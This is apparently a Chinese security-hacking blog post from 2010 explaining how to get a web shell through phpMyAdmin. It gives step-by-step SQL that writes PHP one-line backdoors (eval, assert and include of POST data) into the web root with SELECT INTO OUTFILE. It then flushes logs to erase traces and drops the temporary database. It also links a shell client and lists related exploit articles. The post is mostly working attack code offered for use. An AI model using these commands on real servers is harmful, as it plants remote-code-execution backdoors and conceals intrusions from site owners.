phpmyadmin拿shell

2010, May 12, 7:31 PM. 提权技巧
Submitted by admin

首先:
create database joyuan; /* 建立数据库joyuan */
use joyuan; /* 连接joyuan数据库 */
create table shell(code text); /* 建立表shell字段code文本型数据text */

然后:
insert into shell(code) /* 插入数据到shell表中的code字段 */
values ('shell代码'); /* 值为shell代码 我用PHP一句话,看后面*/
select * into outfile '/home/www/htdocs/server.php' from shell;
/* 将shell表中的内容输出保存为文件(输出到web目录下,要不就无法访问shell了,可以直接输出到phpmyadmin目录下,不知道就phpinfo) */
flush logs /* 删除日志 */

删掉刚建的joyuan数据库,直接删除或执行SQL命令:drop database joyuan;

利用PHP一句话客户端(
http://linux.chaom.net/Shell.Htm)写自己的shell

PHP一句话的服务端地址就是:
http://xxx/phpmyadmin/server.php

搞定,嘿嘿。

PHP一句话服务端代码:

<?php eval($_POST[cmd]);?>

========================================

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;

========================================

①建立数据库

create database hakz                        /*建立数据库hakz*/

use hakz                                          /*连接hakz数据库*/

create table shell(code text)           /*建立表shell,字段code为文本型数据*/       ②插入导出shell

insert into shell(code) values ('后门代码');       /*插入shell代码*/

select * into outfile '/home/www/website/…路径/shell.php' from shell;

                                                  /*导出shell到web路径下*/

flush logs                                       /*删除日志  这一点很重要哦*/        ③删除临时数据库

drop database hakz                   /*或者直接在phpmyadmin中进行可视化操作*/
        最后附上几种PHP一句话服务端代码:

<?php eval($_POST[hakz]);?>
<?php @eval($_POST[hakz]);?>                   /*容错代码*/

<?php assert($_POST[hakz]);?>                  /*assert 函数和 eval一样*/

<?@include($_POST["hakz"]);?>

=====================================

 

« 上一篇 | 下一篇 »

只显示10条记录相关文章
phpMyAdmin3 remote code execute php版本 exploit (浏览: 17387, 评论: 0)
PHPmyadmin 2.11.4万能密码漏洞 (浏览: 17402, 评论: 0)
dedecms、phpmyadmin暴路径最新收集 (浏览: 19103, 评论: 0)
phpMyAdmin table参数SQL注入漏洞 (浏览: 12144, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):